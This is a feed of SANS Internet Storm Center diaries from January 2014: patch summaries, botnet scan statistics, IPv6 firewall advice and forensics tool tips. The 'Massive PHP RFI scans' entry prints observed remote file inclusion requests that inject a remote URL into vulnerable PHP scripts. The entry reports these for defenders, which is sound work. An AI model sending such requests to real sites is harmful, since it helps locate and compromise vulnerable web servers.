Latest Alerts

ISC StormCast for Friday, January 17th 2014 http://isc.sans.edu/podcastdetail.html?id=3785, (Fri, Jan 17th)

Thu, 01/16/2014 - 20:30
(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Port 4028 - Interesting Activity, (Thu, Jan 16th)

Wed, 01/15/2014 - 18:06

Take a look at port 4028.    Thanks to Bill for sharing an analysis that concluded a piece of malware was an Aidra botnet client. His shared analysis asks for a deeper look at port 4028.   I found a published write up from Symantec. [1]

After looking at our port 4028 data [2], there is reason to watch for it.   Please chime in if you are seeing any traffic on port 4028.

# portascii.html # Start Date: 2013-12-01# End Date: 2014-01-15 # Port: 4028 # created: Thu, 16 Jan 2014 01:34:07 +0000 # Date in GMT. YYYY-MM-DD format. date records targets sources tcpratio 2013-12-01 19 2 2 100 2013-12-04 18 2 2 100 2013-12-05 28 4 6 100 2013-12-06 8 2 2 100 2013-12-07 13 5 7 85 2013-12-08 9 5 7 67 2013-12-09 13 3 4 100 2013-12-10 23 5 6 100 2013-12-11 5 3 5 80 2013-12-12 19 3 3 100 2013-12-23 4 2 3 100 2013-12-25 6 2 3 100 2014-01-04 49240 45589 3 100 2014-01-05 1559 1440 40 100 2014-01-08 28910 26975 4 100 2014-01-09 6 6 3 83 2014-01-10 4531 3675 4 100 2014-01-11 76271 72307 3 100 2014-01-13 239 173 3 100 2014-01-14 195 164 6 99 2014-01-15 10 5 2 90 # (c) SANS Inst. / DShield. some rights reserved. # Creative Commons ShareAlike License 2.5 # http://creativecommons.org/licenses/by-nc-sa/2.5/

 

[1] http://www.symantec.com/security_response/writeup.jsp?docid=2013-121118-5758-99
[2]  https://isc.sans.edu/port.html?&startdate=2013-12-17&enddate=2014-01-16&port=4028&yname=sources&y2name=targets

 

 

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

ISC StormCast for Thursday, January 16th 2014 http://isc.sans.edu/podcastdetail.html?id=3782, (Thu, Jan 16th)

Wed, 01/15/2014 - 17:13
(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

ISC StormCast for Wednesday, January 15th 2014 http://isc.sans.edu/podcastdetail.html?id=3779, (Wed, Jan 15th)

Tue, 01/14/2014 - 17:49
(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Oracle Critical Patch Update January 2014, (Tue, Jan 14th)

Tue, 01/14/2014 - 17:40

Today we also got Oracle's quarterly "Critical Patch Update". As announced, we got a gross or 144 different patches from Oracle. But remember that these patches affect 47 different products (if I counted right).

The product we are overall most worried about is Java. With this CPU, 34 security vulnerabilities are fixed in Java SE. So again: Patch or disable (fast).

http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Twitter

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Oracle Critical Patch Update January 2014, (Tue, Jan 14th)

Tue, 01/14/2014 - 13:11

Today we also got Oracle's quarterly "Critical Patch Update". As announced, we got or gross or 144 different patches from Oracle. But remember that these patches affect 47 different products (if I counted right).

The product we are overall most worried about is Java. With this CPU, 34 security vulnerabilities are fixed in Java SE. So again: Patch or disable (fast).

http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Twitter

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Adobe Patch Tuesday January 2014, (Tue, Jan 14th)

Tue, 01/14/2014 - 13:04

 Adobe released two bulletins today:

1 - Reader/Acrobat

This bulletin fixes three vulnerabilities. Adobe rates this one "Priority 1" meaning that these vulnerabilities are already exploited in targeted attacks and administrators should patch ASAP.

After the patch is applied, you should be running Acrobat/Reader 11.0.06 or 10.1.9 .

2 - Flash Player and Air

The flash player patch fixes two vulnerabilities. The Flash player problem is rated "Priority 1" for Windows and OS X. The Air vulnerability is rated "3" for all operating systems. For Linux, either patch is rated "3".

Patching flash is a bit more complex in that it is included with some browsers, in which case you will need to update the browser. For example Internet Explorer 11 and Chrome include Flash.

 

http://helpx.adobe.com/security/products/flash-player/apsb14-01.html
http://helpx.adobe.com/security/products/flash-player/apsb14-02.html

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Twitter

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Microsoft Patch Tuesday January 2014, (Tue, Jan 14th)

Tue, 01/14/2014 - 10:03

Overview of the January 2014 Microsoft patches and their status.

 

# Affected Contra Indications - KB Known Exploits Microsoft rating(**) ISC rating(*) clients servers MS14-001 Code Remote Execution Vulnerability in Microsoft Word and Office Web apps
(ReplacesMS13-072 MS13-084 MS13-086 MS13-100 ) Word and SharePoint / Office Web Apps components related to Word Docs.
CVE-2014-0258
CVE-2014-0259
CVE-2014-0260
CVE-2014-0260 KB 2916605 No. Severity:Important
Exploitability: 1 Critical Critical MS14-002 Privilege Escalation Vulnerabilities in Windows Kernel
(ReplacesMS10-099 ) NDPROXY driver
CVE-2013-5065 KB 2914368 publicly disclosed and used in targeted attacks. Severity:Important
Exploitability: 1 Important Important MS14-003 Elevation of Privilege Vulnerability in Windows Kernel Mode Drivers
(ReplacesMS13-101 ) win32k.sys Kernel Mode Driver
CVE-2014-0262 KB 2913602 No. Severity:Important
Exploitability: 1 Important Important MS14-004 Denial of Service Vulnerability in Microsoft Dynamics AX
(Replaces ) Microsoft Dynamics AX
CVE-2014-0261 KB 2880826 No. Severity:Important
Exploitability: 1 N/A Important We will update issues on this page for about a week or so as they evolve.
We appreciate updates
US based customers can call Microsoft for free patch related support on 1-866-PCSAFETY (*): ISC rating
  • We use 4 levels:
    • PATCH NOW: Typically used where we see immediate danger of exploitation. Typical environments will want to deploy these patches ASAP. Workarounds are typically not accepted by users or are not possible. This rating is often used when typical deployments make it vulnerable and exploits are being used or easy to obtain or make.
    • Critical: Anything that needs little to become "interesting" for the dark side. Best approach is to test and deploy ASAP. Workarounds can give more time to test.
    • Important: Things where more testing and other measures can help.
    • Less Urgent: Typically we expect the impact if left unpatched to be not that big a deal in the short term. Do not forget them however.
  • The difference between the client and server rating is based on how you use the affected machine. We take into account the typical client and server deployment in the usage of the machine and the common measures people typically have in place already. Measures we presume are simple best practices for servers such as not using outlook, MSIE, word etc. to do traditional office or leisure work.
  • The rating is not a risk analysis as such. It is a rating of importance of the vulnerability and the perceived or even predicted threat for affected systems. The rating does not account for the number of affected systems there are. It is for an affected system in a typical worst-case role.
  • Only the organization itself is in a position to do a full risk analysis involving the presence (or lack of) affected systems, the actually implemented measures, the impact on their operation and the value of the assets involved.
  • All patches released by a vendor are important enough to have a close look if you use the affected systems. There is little incentive for vendors to publicize patches that do not have some form of risk to them.

(**): The exploitability rating we show is the worst of them all due to the too large number of ratings Microsoft assigns to some of the patches.

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Twitter

 

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Spamming and scanning botnets - is there something I can do to block them from my site?, (Tue, Jan 14th)

Tue, 01/14/2014 - 04:12
Spamming and scanning botnets - is there something I can do to block them from my site?   This question keeps popping up on forums and all places popular with those beleaguer souls despondent of the random spamming and over filled logs from scanning. Although this isn't a Magic ball question answer does come out a: Maybe, Maybe not.   The reason behind the ambiguity is logical, to a degree; it’s easy trying to hinder, frustrate and reduce the effectiveness of automated botnet processes, like posting and scanning rather than stop them dead.    Why? Glad you asked.   Botnets tend to a number of systems located in random locations globally, you'll get some that are regional specific, but the majority we at the Internet Storm Center (ISC) see are global in distribution. So unless you can pick out only the  six IP addresses you completely trust as good*, you’re accessible to every system on the planet that has an internet link.    First and foremost you need to look at your logs find those non-human attacks or blog spamming posts. We keep saying here at the ISC you need to understand your logs. If you don’t understand what you’re seeing research it or writing in to us. It doesn’t take too long to be able to work out a real human interaction against an automated non-human one. Have a look at one our recent posts [1] to see the types of patterns automated processes leave behind in logs.    Let say you are now at one with your logs files, so what next? From a random reader's submission for the bots they logged I did a little Excel shuffling, then some IP geo-locationing followed by more Excel-ing, finally braking the IP addressed down to which country they came from. The results were interesting as Spain has the highest set of bad IPs (13%), follow by: Argentina (9%), Italy(8%), Colombia (5%), United States (5%), United Kingdom (4%), Mexico (4%), Romania (4%) and Germany (4%).   So what can we divine from these random statistics? First we can acknowledge this is botnet has a significant portion of it bots in Europe, second the next biggest group is in South America, leave the United States well out of the picture. Yeah so what, I hear you yell. Now go back on look at the locations your human visitors came from. With a simple bit of review, you’ll be able to work out you never see visitors, say from South America and New Zealand IP address ranages.    Now you can make the determination to black list (deny) net blocks in those countries from very be able to access your web site or blog. On the flip side you could block everything and white list (allow) certain countries. Or go crazy and play wack-a-mole by adding in every single bad IP address to a block list. It’s up to you.   The point of this piece is look at your logs, understand your visitors, work out who actually needs to get to your site and block out the rest if the now constant automated scans annoy you.   Remember Dshield loves logs [2] and Handlers love weird logs and packets, so start off your New Year by looking at your logs and sending in anything wild, crazy or that just seems plain odd to us at the Storm Center [3]. You’ll learn some new and might help someone who's been puzzling over the same questions you’re looking at now.   [1] https://isc.sans.edu/diary/Massive+PHP+RFI+scans/17387 [2] https://isc.sans.edu/howto.html  [3] https://isc.sans.edu/contact.html#contact-form    * This kinda of breaks the Internet model and takes us back to the good ol’day of having host file to resolve stuff on the ‘Net  

Chris Mohan --- Internet Storm Center Handler on Duty

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

ISC StormCast for Tuesday, January 14th 2014 http://isc.sans.edu/podcastdetail.html?id=3776, (Tue, Jan 14th)

Mon, 01/13/2014 - 16:40
(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Special Webcast today: HTML5, Risky Business or Hidden Security Toolchest? https://www.sans.org/webcasts/html5-risky-business-hidden-security-tool-chest-mobile-web-app-authentication-97650, (Mon, Jan 13th)

Mon, 01/13/2014 - 05:54

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Twitter

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Got an IPv6 Firewall?, (Mon, Jan 13th)

Mon, 01/13/2014 - 05:43

Just like the call "Winter is Coming" in Game of Thrones, we keep hearing IPv6 is coming to our networks spreading doom and gloom to our most priced assets. But just like the clothing worn by some of the actors of the TV show isn't exactly suited for winter, the network security infrastructure deployed currently wouldn't give you a hint that IPv6 is around the corner.

On the other hand, here are some recent numbers:

  • Over 25% of Comcast customers are "actively provisioned with native dual stack broadband" (see comcast6.net)
  • 40% of the Verizon Wireless network is using IPv6 as of December 2013 (http://www.worldipv6launch.org/measurements/)
  • Between July and December last year, Akamai saw IPv6 traffic go up by about a factor of 5 (http://www.akamai.com/ipv6)

When I made our new "Quickscan" router scanning tool available last week, I left it IPv6 enabled. So it is no surprise, that I am getting e-mails like the following:

The results were "interesting"
...
A few weeks ago I had installed an IPv6 capable modem and updated my router config to enable IPv6. The results were glorious in that IPv6 ran like a charm.
The sober facts arose when I ran the ISC router scan - it used my IPv6 address, which hooked directly to my desktop (behind my firewall) and pulled up my generally unused native Apache service. 
I went over my router config with a fine-tooth comb and realized that my router has no support for IPv6 filtering.

So does your firewall filter IPv6? Or just "use it"? Do you have sufficient host based controls in place? You don't necessarily have to assign globally routable IPv6 addresses. You could use proxies to terminate "global" IPv6 and only use ULA addresses internally. But in particular home users are unlikely to go that route.   (I am working on making the "quickscan" tool (https://isc.sans.edu/quickscan.html [login required]) more generic. For now it only scans common router admin and backdoor ports)

 

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute

IPv6 Security Training ( https://www.sans.org/sec546 )
Twitter

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

ISC StormCast for Monday, January 13th 2014 http://isc.sans.edu/podcastdetail.html?id=3773, (Mon, Jan 13th)

Sun, 01/12/2014 - 17:36
(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Notification Glitch - Multiple New Diary Notifications, (Sun, Jan 12th)

Sun, 01/12/2014 - 08:45

We have been notified that some of you have received repeated notifications being sent out regarding a recently-published diary. Notification has been turned off while we are investigating the issue. We apologize about the inconvenience.

-----------

Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Windows Autorun-3, (Fri, Jan 10th)

Sat, 01/11/2014 - 21:33

In previous diaries I talked about some of the most common startup locations in windows environment.

In this diary I will talk about some of the method to enumerate these values from registry

1-Autoruns

Sysinternals Autoruns is the best tool available to enumerate the startup locations; it can locate almost every startup location in Windows. If you are a big fan of command line or you need something scriptable, Autorunsc is the command line version of Autoruns . Autoruns can detect the startup locations for the current user and any other user using the same system.

In addition one of the most powerful features of Autoruns is the ability of analyzing offline systems ,this will be very useful if you have a binary image of a compromised system.

Here is how to use it with an offline system:

1-Mount the image

2-File->Analyze Offline System..


 

2-Provide System Root and User Profile Path

 

 

3-Click OK


 

2-Registry Editors/Viewers

In forensics world we cannot depend on one tool only, in many cases we have to double check the result of one tool using different tool.

In addition to the windows built-in tools (RegEdit, reg command and PowerShell Get-ChildItem/Get-ItemProperty) there are some great tools to analysis registry such as AccessData FTK Registry Viewer, Harlan Carvy RegRipper and TZWorks Yet Another Registry Utility (yaru).

One big advantage of yaru is the ability to recover deleted registry keys which is very useful when someone is trying to hide his track.



3-WMIC

Windows Management Instrument Command-line has its own way to retrieve the startup location.

Wmic startup list full


 

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

tcpflow 1.4.4 and some of its most Interesting Features, (Sat, Jan 11th)

Sat, 01/11/2014 - 14:43

The latest version can of course reconstruct TCP flows but also has some interesting feature such as being able to carve files out of web traffic (zip, gif, jpg, css, etc) and reconstruct webpages. Another nice feature is the fact it provides a summary PDF report of the pcap file processed by tcpflow.

When enabling file reconstructions, the web output of the files are in the following format which differentiate them from the regular TCP flow reconstructed files. Their format ends with HTTPBODY-001.html, HTTPBODY-001.gif,  HTTPBODY-001.css or HTTPBODY-001.zip to name a few.

A precompiled 32 and 64 bit version 1.4.0b1 is available for download here and contains all the same functionality the Unix version which can be downloaded here. This basic setup replays a pcap file and enables all the features use in tcpflow:

tcpflow -a -r -o tcpflow daemonlogger.pcap

-a: do ALL post-processing
-r file: read packets from tcpdump pcap file (may be repeated)
-o  outdir   : specify output directory (default '.')

[1] http://www.circlemud.org/jelson/software/tcpflow/
[2] https://github.com/simsong/tcpflow
[3] http://www.digitalcorpora.org/downloads/tcpflow/

-----------

Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Massive PHP RFI scans, (Thu, Jan 9th)

Sat, 01/11/2014 - 03:02
Today one of our readers, Yinette, sent in a pcap of a pretty massive PHP RFI scans. Yinette has been seeing this for quite some time and the number of requests sent by this (yet unknown) bot or botnet kept rising. Judging by the source IP address the bots appear to be running on compromised web servers with typical CPanel installations and large numbers of hosted virtual servers.   The scanning requests are relatively fast and in the capture Yinette made the bot constantly sent at least 2 requests per second. All requests try to exploit a RFI vulnerability (I haven’t checked yet to see if all of them are well known, but a cursory inspection says most of them are well known) and the file included is the humans.txt static file on Google (http://www.google.com/humans.txt).   The bot almost certainly parses the output and if it sees contents of the humans.txt file it knows that the site has a RFI (Remote File Inclusion) vulnerability. Google’s availability and uptime help of course.   Some observed requests are shown below:   GET /kernel/class/ixpts.class.php?IXP_ROOT_PATH=http://www.google.com/humans.txt? HTTP/1.0 GET /kernel/loadkernel.php?installPath=http://www.google.com/humans.txt? HTTP/1.0 GET /kmitaadmin/kmitam/htmlcode.php?file=http://www.google.com/humans.txt? HTTP/1.0 GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.google.com/humans.txt? HTTP/1.0 GET /lang/leslangues.php?fichier=http://www.google.com/humans.txt? HTTP/1.0 GET /lang_english/lang_main_album.php?phpbb_root_path=http://www.google.com/humans.txt?a= HTTP/1.0 GET /language/lang_english/lang_activity.php?phpbb_root_path=http://www.google.com/humans.txt? HTTP/1.0 GET /language/lang_english/lang_admin_album.php?phpbb_root_path=http://www.google.com/humans.txt?a= HTTP/1.0 GET /language/lang_german/lang_admin_album.php?phpbb_root_path=http://www.google.com/humans.txt?a= HTTP/1.0 GET /language/lang_german/lang_main_album.php?phpbb_root_path=http://www.google.com/humans.txt?a= HTTP/1.0 GET /latestposts.php?forumspath=http://www.google.com/humans.txt? HTTP/1.0 GET /latex.php?bibtexrootrel=http://www.google.com/humans.txt? HTTP/1.0 GET /layout/default/params.php?gConf[dir][layouts]=http://www.google.com/humans.txt? HTTP/1.0 GET /ldap/authldap.php?includePath=http://www.google.com/humans.txt? HTTP/1.0 GET /learnPath/include/scormExport.inc.php?includePath=http://www.google.com/humans.txt? HTTP/1.0 GET /lib.editor.inc.php?sys_path=http://www.google.com/humans.txt? HTTP/1.0 GET /lib/Loggix/Module/Calendar.php?pathToIndex=http://www.google.com/humans.txt? HTTP/1.0 GET /lib/Loggix/Module/Comment.php?pathToIndex=http://www.google.com/humans.txt? HTTP/1.0 GET /lib/Loggix/Module/Rss.php?pathToIndex=http://www.google.com/humans.txt? HTTP/1.0 GET /lib/Loggix/Module/Trackback.php?pathToIndex=http://www.google.com/humans.txt? HTTP/1.0 GET /lib/action/rss.php?lib=http://www.google.com/humans.txt? HTTP/1.0 GET /lib/activeutil.php?set[include_path]=http://www.google.com/humans.txt? HTTP/1.0 GET /lib/addressbook.php?GLOBALS[basedir]=http://www.google.com/humans.txt? HTTP/1.0 GET /lib/armygame.php?libpath=http://www.google.com/humans.txt? HTTP/1.0 GET /lib/authuser.php?root=http://www.google.com/humans.txt? HTTP/1.0   This is only a small part of all the requests the bot sends. In total, on Yinette’s web site it sent 804 requests (that’s 804 vulnerabilities it’s trying to exploit)! This indeed might be someone trying to build a big(er) botnet.

Are you seeing same/similar requests on your web site too? Or maybe you managed to catch the bot on a compromised machine or a honeypot? Let us know!

UPDATE:

We received a lot of submissions regarding this – thanks to everyone that sent their logs/observations in! After analyzing logs we received it appears that these scans started around 21st of December 2013 and they are still going on.   Also, the capture Yinette did appear to have captured only a part of the attack. We received several submissions showing exact requests (that fortunately resulted in 404 errors :) for most of them).   The total number of requests done is even higher – the bot tries to access 2217 (!!!) URIs. Every URI accessed is a RFI vulnerability and they always (at least in these attacks) try to retrieve the humans.txt file from Google (it would be interesting if someone at Google could analyze their logs of requests for this file).   So, this is getting pretty large, unfortunately we haven’t seen the bot’s code so far – if you do manage to catch it please upload it through our contact form so we can analyze it.

--
Bojan
@bojanz
INFIGO IS

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

PHP 5.4.24 & 5.5.8 Released - http://www.php.net/downloads.php & http://windows.php.net/download/, (Sat, Jan 11th)

Fri, 01/10/2014 - 17:30

----------- Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

PHP 5.4.24 & 5.5.8 Released - http://www.php.net/downloads.php & http://windows.php.net/download/, (Sat, Jan 11th)

Fri, 01/10/2014 - 17:30

----------- Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Adobe joins the show on Tuesday too and announces patches for Adobe Reader and Acrobat: http://helpx.adobe.com/security/products/acrobat/apsb14-01.html, (Fri, Jan 10th)

Fri, 01/10/2014 - 13:11

-- Bojan INFIGO IS

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts